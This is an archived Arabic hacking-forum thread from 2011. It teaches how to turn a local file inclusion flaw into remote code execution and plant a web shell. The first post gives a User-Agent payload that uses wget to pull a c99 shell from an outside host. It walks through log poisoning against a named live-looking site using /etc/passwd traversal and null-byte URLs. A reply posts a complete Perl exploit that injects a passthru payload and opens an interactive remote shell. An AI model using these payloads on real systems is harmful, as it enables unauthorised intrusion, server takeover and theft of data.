:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل (http://www.vbspiders.com/vb/showthread.php?t=58697)

Mr.MeRo 09-27-2011 10:30 AM

شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل
 


السلام عليكم ورحمة الله وبركاته


http://www.youtube.com/watch?v=llD45...layer_embedded

شرح كتابي http://arhack.net/vb/images/smilies/biggrin.gif رفع الشيل

نبدا اول حاجه هنحتاج اضافه فى الفيرفوكس : User-Agent switcher
بعد التحميل تقوم بأضافه يوزر جديد
http://images.devs-on.net/Image/Ekdv...w46-Region.png

وتقوم بتعديل كود User Agent
http://images.devs-on.net/Image/bS4X...Plo-Region.png
الى موجود بكود مثلا سحب الشيل علي السيرفر
كود PHP:

<? passthru ('wget http://zone-t.org/upload/txt/c99.txt -O x.php'?>

لحد كدا كويس
نسحب etc/passwd علشان تتاكد ان الموقع مصاب

كويس نيجي لطريقه التطبيق علي سيرفر مركب سي بنل

كود PHP:

http://www.upworldgov.org/oms/oms.php?loc=/etc//passwd%00 

تمام

بنشوف الدومين بتاع الموقع المصاب وهوه
upworldgov.org
نجيب يوزر الموقع عن طريق عرض الخطأ بتاع الانكلود
كود PHP:

http://www.upworldgov.org/oms/oms.php?loc=./ 

تمام دلواتى تأكتف اليوزر الى انت كريته في الـ user agent من ادوات > User agnet > حدد اليوزر
تمام
نعمل رفرش للصفحه

ونروح علي ملف الـ log بتاع الدومين علشان الشيل يتسحب

بيكون مثال الوج كدا
كود PHP:

/usr/local/apache/domlogs/user/domain.com 

نقوم بتغير البينات يصبح التطبيق كدا
كود PHP:

http://www.upworldgov.org/oms/oms.php?loc=/usr/local/apache/domlogs/upworldg/upworldgov.org%00 

متنساش الـ %00 سعات بتحتجها في بعض السيرفرات كدا تم سحب الشيل تروح علي المكان الى فيه ملف تغيره بـ x.php الى حطينها في الـ user agnet

تم بحمد الله نيجي بقي نرد علي الناس الى ردت في الموضوع الاول http://arhack.net/vb/images/smilies/biggrin.gif


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++

RO0OTMAN

حبيبي يا كبير http://arhack.net/vb/images/smilies/biggrin.gif
وحشنى ياض والله
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++
جبروت هكر

يعطييك العافيه

الترقيع : تعطيل دوال تنفيذ الاوامر

ماقصرت

منور يا اخوى
حقن الـ
كود PHP:

<?php phpinfo();?>

بيدينا معلومات كافيه عن السيرفر تسمح لنا بالتخطى كمان مش كل السيرفرات بتقفل كل الدوال ولو قفلت كل الدوال اكيد في دوال مثلا استعراض سورس صفحه كدا انت هكر وفاهم كويس الاختراق مش تطبيق لشرح واحد او اتنين كل واحد وله تفكير وعقليه بيستخدمها علشان يوصل لهدفه

++++++++++++++++++++++++++++++++++++++++++++++++++ ++
Mr.AaMa

سلمت عالطرح وفيه بعد
/var/log/apache2/access.log
/var/log/httpd-access.log
/var/log/lighttpd/access.log

ايختلف باختلاف اصدار الاباتشي .. دمت بود

تمام اخوي ويوجد سكربيت بريل بيفي بالغرض
كمان جمع المعلومات بيخلص الليله





كود PHP:

#!/usr/bin/perl -w
    use LWP::UserAgent;
    use IO::Socket;
    use LWP::Simple;

    $log="../";
    @apache=(
    "../../../../../var/log/httpd/access_log",
    "../apache/logs/access.log",
    "../../apache/logs/access.log",
    "../../Apache2.2/logs/access.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/access.log",
    "../logs/access.log",
    "../../logs/access.log",
    "../../../logs/access.log",
    "../../../../logs/access.log",
    "../../../../../logs/access.log",
    "../../../../../etc/httpd/logs/access_log",
    "../../../../../etc/httpd/logs/access.log",
    "../../.. /../../var/www/logs/access_log",
    "../../../../../var/www/logs/access.log",
    "../../../../../usr/local/apache/logs/access_log",
    "../../../../../usr/local/apache/logs/access.log",
    "../../../../../var/log/apache/access_log",
    "../../../../../var/log/apache/access.log",
    "../../../../../var/log/access_log",
    "../../../../../var/log/access_log"
    );

    my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

    print "\n==========================================\n";
    print "           LFI to RCE Exploit \n";
    print "           By CWH Underground \n";
    print "==========================================\n";
    
    if (@ARGV < 2)
    {
        print "Usage: ./xpl.pl <Host> <Path>\n";
        print "Ex. ./xpl.pl www.hackme.com /ktp/index.php?page=\n";
    }

    $host=$ARGV[0];
    $path=$ARGV[1];

    if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}
    
    print "\nTrying to Inject the Code...\n";
    $CODE="<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
    $socket = IO::Socket::INET->new(Proto=>"tcp",   PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to   host.\n\n";
    print $socket "GET /cwhunderground "."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#"." HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    
    if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}
    
    foreach $getlog(@apache)
                {
                  chomp($getlog);
          $find= $host.$path.$getlog."%00";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
          $req = HTTP::Request->new(GET => $find);
          $res = $xpl->request($req);
          $info = $res->content;
                  if($info =~ /cwhunderground/)
                  {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}
                }
    
    print "cwh-shell# ";
    chomp( $cmd = <STDIN> );
    
    while($cmd !~ "exit") {   
             $shell= $host.$path.$log."%00&cmd=$cmd";
             $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
             $req = HTTP::Request->new(GET => $shell);
             $res = $xpl->request($req);
             $info = $res->content; 
                 if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) 
                 {print $1;}
             print "cwh-shell# ";
             chomp( $cmd = <STDIN> ); 
    }



مع تيحاتى ميرو

bleu moon 09-27-2011 11:05 AM

رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل
 
بارك الله فيك حبيبي ^^
الشرح شفتووا من قبل ؛)

دام علاء العماد 09-27-2011 01:57 PM

رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل
 
بارك الله فيك يا أخي الكريم و جزاك الله عنا خير الجزاء

آدم الكندي 09-27-2011 11:02 PM

رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل
 
موضوع رائع جدااا.. من شخص اروع ... الف شكر بس لو سمحت فكرة سكربت البيرل لم افهمها .. ياريت لو يكون هناك فديو او شرح لفهم خطوات عمل السكربت تحياتي لك

آدم الكندي 09-28-2011 12:00 AM

رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل
 
لو كنت مكمل الشرح ورافع شل ... كان اصبح الموضوع قنبله ... تحياتي يابطل


الساعة الآن 08:11 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0